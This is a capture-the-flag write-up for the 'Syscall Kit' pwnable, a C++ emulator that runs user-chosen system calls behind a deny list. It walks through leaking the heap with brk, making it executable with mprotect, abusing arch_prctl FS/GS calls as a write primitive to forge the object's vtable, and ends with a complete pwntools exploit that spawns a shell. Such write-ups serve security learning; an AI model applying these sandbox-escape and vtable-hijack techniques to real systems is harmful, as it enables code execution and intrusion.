Syscall Kit
zer0pts 2020 - Syscall Kit
Overview
Syscall Kit is a hard rated pwnable challenge created by ptr-yudai.
It is simply an emulator written in C++ that’s used to execute user-provided system calls.
There are some restrictions however, and our goal is to pop shell from this somewhat restricted sandbox.
You can download the challenge attachments here
Analysis
The challenge just contains two files:
- chall
- main.cpp
Here are the protections enabled on the binary.
1
2
3
4
5
6
7
8
9
mark@rwx:~/Desktop/Practice/BinExp/Challs/STACK/SyscallKit$ checksec chall
[*] '/home/mark/Desktop/Practice/BinExp/Challs/STACK/SyscallKit/chall'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
Stripped: No
mark@rwx:~/Desktop/Practice/BinExp/Challs/STACK/SyscallKit$
When we run the program, we are asked to give it a syscall and it’s argument.
In this case, I used the exit syscall whose sys_num == 60, and from the return value we can see it infact does what it says.
Since we are given the source code, we don’t have to reverse engineer the binary.
Here’s the source:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
/**
* syscall kit - WinterKosenCTF 2020
*
* This application is (maybe) made for educational purpose
* and for those who learn system calls.
*/
#include <iostream>
#include <sys/syscall.h>
class Emulator {
private:
unsigned long rax;
unsigned long rdi;
unsigned long rsi;
unsigned long rdx;
virtual void set(std::string, unsigned long&);
virtual int check();
virtual void syscall();
public:
Emulator();
virtual void emulate();
};
/**
* Constructor
*/
Emulator::Emulator() {
this->rax = 0;
this->rdi = 0;
this->rsi = 0;
this->rdx = 0;
}
/**
* Read system call number and arguments
*/
void Emulator::set(std::string msg, unsigned long ®) {
std::cout << msg;
std::cin >> reg;
if (!std::cin.good()) exit(1);
}
/**
* Filter dangerous system calls
*/
int Emulator::check() {
if (this->rax >= 0x40000000) return 1; // x32 ABI is dangerous!
if (this->rax == SYS_open) return 1; // never open files
if (this->rax == SYS_openat) return 1;
if (this->rax == SYS_write) return 1; // no more leak
if (this->rax == SYS_read) return 1; // no more overwrite
if (this->rax == SYS_sendfile) return 1;
if (this->rax == SYS_execve) return 1; // of course not!
if (this->rax == SYS_execveat) return 1;
if (this->rax == SYS_ptrace) return 1; // may ruine the program
if (this->rax == SYS_fork) return 1;
if (this->rax == SYS_vfork) return 1;
if (this->rax == SYS_clone) return 1;
return 0;
}
/**
* Call syscall
*/
void Emulator::syscall() {
asm volatile ("movq %0, %%rdi":: "a"(this->rdi));
asm volatile ("movq %0, %%rsi":: "a"(this->rsi));
asm volatile ("movq %0, %%rdx":: "a"(this->rdx));
asm volatile ("movq %0, %%rax":: "a"(this->rax));
asm volatile ("syscall");
asm volatile ("movq %%rax, %0": "=a"(this->rax));
}
/**
* Run emulator
*/
void Emulator::emulate(void)
{
int i;
for(i = 0; i < 10; i++) {
std::cout << "=========================" << std::endl;
this->set("syscall: ", this->rax);
this->set("arg1: ", this->rdi);
this->set("arg2: ", this->rsi);
this->set("arg3: ", this->rdx);
std::cout << "=========================" << std::endl;
if (this->check()) {
std::cerr << "syscall=" << this->rax << " is not allowed" << std::endl;
continue;
} else {
this->syscall();
std::cout << "retval: " << std::hex << this->rax << std::endl;
}
}
std::cout << "Bye!" << std::endl;
}
Emulator *m;
void setup(void)
{
std::setbuf(stdin, NULL);
std::setbuf(stdout, NULL);
std::setbuf(stderr, NULL);
m = new Emulator();
}
int main(void)
{
setup();
m->emulate();
exit(0);
}
The code is small, but I’ll walk through each section.
First, there is a class named Emulator. It contains four private attributes representing the x86_64 system call calling convention registers, along with four virtual methods and 1 public virtual method.
1
2
3
4
5
6
7
8
9
10
11
12
13
class Emulator {
private:
unsigned long rax;
unsigned long rdi;
unsigned long rsi;
unsigned long rdx;
virtual void set(std::string, unsigned long&);
virtual int check();
virtual void syscall();
public:
Emulator();
virtual void emulate();
};
This is the constructor. It simply initializes all of the object’s register fields to zero:
1
2
3
4
5
6
Emulator::Emulator() {
this->rax = 0;
this->rdi = 0;
this->rsi = 0;
this->rdx = 0;
}
The main function first initializes the object then calls the emulate method:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
void setup(void)
{
std::setbuf(stdin, NULL);
std::setbuf(stdout, NULL);
std::setbuf(stderr, NULL);
Emulator *m = new Emulator();
}
int main(void)
{
setup();
m->emulate();
exit(0);
}
The emulate method runs for 10 iterations. On each iteration, it sets the object’s register fields using Emulator::set.
After the registers are set, it then goes ahead to call Emulator::check, if the return value is true it would simply continue else it calls Emulator::syscall.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
void Emulator::emulate(void)
{
int i;
for(i = 0; i < 10; i++) {
std::cout << "=========================" << std::endl;
this->set("syscall: ", this->rax);
this->set("arg1: ", this->rdi);
this->set("arg2: ", this->rsi);
this->set("arg3: ", this->rdx);
std::cout << "=========================" << std::endl;
if (this->check()) {
std::cerr << "syscall=" << this->rax << " is not allowed" << std::endl;
continue;
} else {
this->syscall();
std::cout << "retval: " << std::hex << this->rax << std::endl;
}
}
std::cout << "Bye!" << std::endl;
}
void Emulator::set(std::string msg, unsigned long ®) {
std::cout << msg;
std::cin >> reg;
if (!std::cin.good()) exit(1);
}
Our main point of interest is Emulator::check:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int Emulator::check() {
if (this->rax >= 0x40000000) return 1; // x32 ABI is dangerous!
if (this->rax == SYS_open) return 1; // never open files
if (this->rax == SYS_openat) return 1;
if (this->rax == SYS_write) return 1; // no more leak
if (this->rax == SYS_read) return 1; // no more overwrite
if (this->rax == SYS_sendfile) return 1;
if (this->rax == SYS_execve) return 1; // of course not!
if (this->rax == SYS_execveat) return 1;
if (this->rax == SYS_ptrace) return 1; // may ruine the program
if (this->rax == SYS_fork) return 1;
if (this->rax == SYS_vfork) return 1;
if (this->rax == SYS_clone) return 1;
return 0;
}
This method prevents the use of specific system calls, as well as any syscall value that falls into the x32 ABI range.
Conceptually, it behaves like a simple seccomp filter. If the syscall number in rax matches one of the blocked syscalls, check() returns 1, meaning the syscall should be rejected. This is similar to a seccomp rule using SCMP_ACT_KILL_PROCESS, where attempting to execute a blocked syscall causes the process to be terminated.
As expected, Emulator::syscall uses inline assembly to load the CPU registers with the values stored in the object, then executes the syscall instruction.
After the syscall runs, its return value is placed in rax, and that value is then written back into the object’s rax field.
The return value is also printed (as shown in the src code).
1
2
3
4
5
6
7
8
void Emulator::syscall() {
asm volatile ("movq %0, %%rdi":: "a"(this->rdi));
asm volatile ("movq %0, %%rsi":: "a"(this->rsi));
asm volatile ("movq %0, %%rdx":: "a"(this->rdx));
asm volatile ("movq %0, %%rax":: "a"(this->rax));
asm volatile ("syscall");
asm volatile ("movq %%rax, %0": "=a"(this->rax));
}
Exploitation
What’s the vulnerability?
Well, there actually isn’t any vulnerability
The challenge description says this:
1
It's a good tool to learn syscall, isn't it?
So we somehow need to leverage this emulator to trigger a syscall that would eventually spawn a shell.
Looking at the setup, we can only control 3 argument of the syscall of our choosing.
At the same time, it blocks so many syscalls that we could’ve easily used to gain a shell.
I’m going to be using this linux kernel syscall table as a reference
As of the latest kernel version (v6.17) there are 365 syscalls.
Does it mean we need to go through all the syscalls (354) not blocked by the emulator?
Not necessarily…
The approach I took was to actually parse all the syscalls based on the number of argument it takes.
There’s a json export of the syscall table here
I wrote a script to parse all the syscalls I can use that makes use of only 3 or lesser arguments.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import json
NUMBER = [0, 1, 2, 0x101, 0x28, 0x3b, 0x142, 0x65, 0x39, 0x3a, 0x38]
TABLE = "table.json"
with open(TABLE, "r") as f:
dataset = json.load(f)
syscalls = dataset["syscalls"]
output = {
"syscall": []
}
for syscall in syscalls:
if (len(syscall["signature"]) <= 3) and (syscall["number"] not in NUMBER):
output["syscall"].append(syscall)
# print(len(output["syscall"]))
print(json.dumps(output))
Although doing that only just reduces the potential syscall we can make use of to 236.
It’s still a lot.
I was thinking of spawning a local instance of the syscall table since it’s open source but that’s just a lot of work and tbf as of 2020 it never existed.
Luckily the UI is awesome, it has a view where we can see the arguments needed.
My goal still remained the same, check out the syscalls that uses less or equal to 3 number of arguments.
Here are the syscalls I found interesting to check:
1
2
3
4
5
6
int brk(void *addr);
int mprotect(unsigned long start, size_t len, unsigned long prot);
ssize_t readv(int fd, const struct iovec *iov, int iovcnt);
ssize_t writev(int fd, const struct iovec *iov, int iovcnt);
int syscall(SYS_arch_prctl, int op, unsigned long addr);
// ....
Firstly, we need to make our goal clear. Our goal is to gain $rip control.
What possible way can this be achieved?
One way would be a virtual function table (vtable) hijack.
C++ is an object oriented programming language.
Virtual functions is a key mechanism to support polymorphism in C++.
For each class with virtual functions, depending on the class inheritance hierarchy, the compiler will create one or more associated virtual function table (vtable).
Looking at the object’s initialization, we can see that the Emulator instance is allocated on the heap:
1
2
3
4
5
6
7
8
void setup(void)
{
std::setbuf(stdin, NULL);
std::setbuf(stdout, NULL);
std::setbuf(stderr, NULL);
m = new Emulator();
}
Here’s the heap layout after initialization:
gef> emu_dump 0x5555556162b0
====== Emulator @ 0x5555556162b0 ======
[+] vtable : 0x555555602ce0
[+] virtual functions
[0] -> 0x555555401114
[1] -> 0x55555540116e
[2] -> 0x555555401290
[3] -> 0x5555554012d8
===============================
This is the gdb script
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
define emu_dump
set $base = (char *)$arg0
printf "====== Emulator @ %p ======\n", $base
set $vtable = *(void **)$base
printf "[+] vtable : %p\n", $vtable
printf "[+] virtual functions\n"
set $i = 0
while $i < 4
set $fn = *(void **)($vtable + ($i * 8))
printf " [%d] -> %p\n", $i, $fn
set $i = $i + 1
end
printf "===============================\n"
end
Because the vtable pointer itself resides in a heap-allocated object, it becomes a writable target.
If we can forge the vtable, then any subsequent virtual method call on the object would dereference our fake vtable and jump to our controlled function pointer instead.
But before we perform a write, we need to know the location of the heap.
Reading the man page for brk
1
Calling sbrk() with an increment of 0 can be used to find the current location of the program break.
The program break marks the point where the heap currently ends in the process’s virtual address space.
Here’s the helper function I wrote:
1
2
3
4
5
6
7
8
def syscall(sys_num, rdi=0, rsi=0, rdx=0):
io.sendlineafter(b"syscall:", str(sys_num).encode())
io.sendlineafter(b"arg1:", str(rdi).encode())
io.sendlineafter(b"arg2:", str(rsi).encode())
io.sendlineafter(b"arg3:", str(rdx).encode())
io.recvuntil(b"retval: ")
ret = int(io.recvline(), 16)
return ret
We can leak the heap address by doing this:
1
2
3
4
PAGE = 0x21000
brk = 0xc
heap_base = syscall(brk, 0) - PAGE
info("heap base: %#x", heap_base)
If you think about it, we now have the heap address, but we still don’t really know anywhere in memory (e.g libc) and to corrupt a vtable we need a form of arbitrary write primitive.
The reason we would need a libc leak is to be able to call functions like system or a one gadget, but that would require us to create an arbitrary read.
In essence, increasing the number of syscalls we can make, remember we can only do it 10 times.
A way around that is to change the heap protection to (PROT_READ | PROT_WRITE | PROT_EXEC) making the heap region RWX.
1
2
mprotect = 0xa
syscall(mprotect, heap_base, PAGE, 0x7)
With that we can simply just jump to the heap and get shellcode execution going.
But now how do we corrupt the vtable?
This was where the issue began!
While going through the syscalls, I found an interesting system call called arch_prctl.
1
2
int syscall(SYS_arch_prctl, int op, unsigned long addr);
int syscall(SYS_arch_prctl, int op, unsigned long *addr);
It says:
- when we use
ARCH_SET_FSsubfunction that we are able to set the 64-bit base for theFSregister toaddr - while the
ARCH_GET_FSreturns the 64-bit base value for theFSregister of the calling thread and stores it in memory pointer byaddr
The same goes for the
GSregister
Incase you don’t know what the FS register is, they’re segment registers, but on modern 64-bit systems they’re mostly used for thread and CPU-local data.
You can check it out here
The important thing however is that this gives us a form of arbitrary write.
We can quickly test it out:
1
2
3
arch_prctl = 0x9e
syscall(arch_prctl, ARCH_SET_FS, 0x414141414141)
syscall(arch_prctl, ARCH_GET_FS, vtable_addr)


At this point, we’ve corrupt the fs_base register.
But once the program returns to Emulator::emulate it crashes

This makes sense, because the fs register is constantly referenced during program execution (e.g reading the stack canary fs:0x28).
Now this forces us to write only valid addresses into memory, which slightly constrains the primitive.
However, this isn’t a major obstacle because we can now overwrite the object’s vtable pointer itself.
But how to gain $rip from this?
Here’s what I initially did.
If you’ve noticed, the third syscall argument is not actually used by the emulator / by the syscall, but we fully control its value. That makes it a convenient place to stage data.
So the idea is to construct a fake object layout like this:
1
2
*(uintptr_t*)fake_obj = &this->arg3;
this->vtable = &fake_obj;
With this setup, when Emulator::set triggers a virtual call, execution will dereference the corrupted vtable, jump into our fake vtable, and then invoke the first function pointer.
That function pointer resolves to this->arg3, which we control directly.
Since we’ve placed our staged shellcode, we are therefore able to execute shellocde, the restriction with this is that we can only use 8 bytes shellcode.
Here’s a sample:
1
2
3
4
5
6
7
8
9
10
arch_prctl = 0x9e
emu_obj = heap_base + 0x122b0
vtable_addr = heap_base + 0x200
vtable = emu_obj + 0x20
syscall(arch_prctl, ARCH_SET_FS, vtable)
syscall(arch_prctl, ARCH_GET_FS, vtable_addr)
syscall(arch_prctl, ARCH_SET_FS, vtable_addr)
syscall(arch_prctl, ARCH_GET_FS, emu_obj, 0x9090909090909090)

The method Emulator::set is called back at Emulator::emulate:
1
this->set("syscall: ", this->rax);
This is the register state at the point of the program executing our shellcode.
Ideally, we would want to create a staged shellcode (i.e do read syscall)
1
ssize_t read(int fd, void buf[.count], size_t count)
Reason is because we can’t exactly do much with just 8 bytes.
For a staged execution we can use the initial control flow to trigger a second-stage payload that lives elsewhere (e.g. heap), then jump into that.
We only need to control 4 registers (rax, rdi, rsi, rdx).
In our case, all registers are populated by the emulator’s calling convention, which makes clean syscall setup difficult.
This was the shortest shellcode I could come up with.
1
2
3
4
5
xor eax, eax
mov edi, eax
mov rsi, [rsp+0x10]
shr edx, 0x1
syscall
It requires 13 bytes which is too much.
What now?
I decided to check the second subfunction (writing to GS)
It behaves in a similar way however it doesn’t require that we pass in a valid address to it.



This is good, because recall that our shellcode was 13 bytes, with only 8 bytes fully controllable, we’re left with 5 bytes.
With this arbitary write, we can place the remaning bytes to (uint8_t*)&this->arg3 + 8.
Actually, I did notice a thing with writing to the segment registers.
It can only store up to a certain value.
Checking the kernel source code for the syscall handler do_arch_prctl_64
If the value we want to write is greater than TASK_SIZE_MAX it returns EPERM
1
#define EPERM 1 /* Operation not permitted */
Cross-referencing this, we end up at the following kernel trace:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
#define TASK_SIZE_MAX task_size_max()
static __always_inline unsigned long task_size_max(void)
{
unsigned long ret;
alternative_io("movq %[small],%0","movq %[large],%0",
X86_FEATURE_LA57,
"=r" (ret),
[small] "i" ((1ul << 47)-PAGE_SIZE),
[large] "i" ((1ul << 56)-PAGE_SIZE));
return ret;
}
#define X86_FEATURE_LA57 (16*32+16) /* "la57" 5-level page tables */
All this is doing is defining the maximum user-space virtual address range. In other words, it sets the upper boundary of valid user-mode addresses, ensuring we can’t map or use pointers outside of user space.
Anyways, our 5 byte left has enough bit to fit into this range.
Here’s the final solve:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from pwn import *
exe = context.binary = ELF('chall')
context.terminal = ['gnome-terminal', '--maximize', '-e']
context.log_level = 'info'
def start(argv=[], *a, **kw):
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE:
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
gdbscript = '''
brva 0x12C4
continue
'''.format(**locals())
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
def init():
global io
io = start()
def syscall(sys_num, rdi=0, rsi=0, rdx=0):
io.sendlineafter(b"syscall:", str(sys_num).encode())
io.sendlineafter(b"arg1:", str(rdi).encode())
io.sendlineafter(b"arg2:", str(rsi).encode())
io.sendlineafter(b"arg3:", str(rdx).encode())
io.recvuntil(b"retval: ")
ret = int(io.recvline(), 16)
return ret
def solve():
brk = 0xc
mprotect = 0xa
arch_prctl = 0x9e
ARCH_SET_GS = 0x1001
ARCH_SET_FS = 0x1002
ARCH_GET_FS = 0x1003
ARCH_GET_GS = 0x1004
PAGE = 0x21000
pack = lambda data: int.from_bytes(data, byteorder='little')
heap_base = syscall(brk, 0) - PAGE
info("heap base: %#x", heap_base)
emu_obj = heap_base + 0x122b0
vtable_addr = heap_base + 0x200
vtable = emu_obj + 0x20
syscall(mprotect, heap_base, PAGE, 0x7)
syscall(arch_prctl, ARCH_SET_FS, vtable)
syscall(arch_prctl, ARCH_GET_FS, vtable_addr)
sc = asm(
"""
sc:
xor eax, eax
mov edi, eax
mov rsi, [rsp+0x10]
shr edx, 0x1
syscall
"""
)
cont = sc[8:]
syscall(arch_prctl, ARCH_SET_GS, pack(cont))
syscall(arch_prctl, ARCH_GET_GS, emu_obj + 0x28)
syscall(arch_prctl, ARCH_SET_FS, vtable_addr)
syscall(arch_prctl, ARCH_GET_FS, emu_obj, u64(sc[:8]))
payload = asm("nop") * 0x100
payload += asm(shellcraft.sh())
io.send(payload)
io.interactive()
def main():
init()
solve()
if __name__ == '__main__':
main()
Running it works!












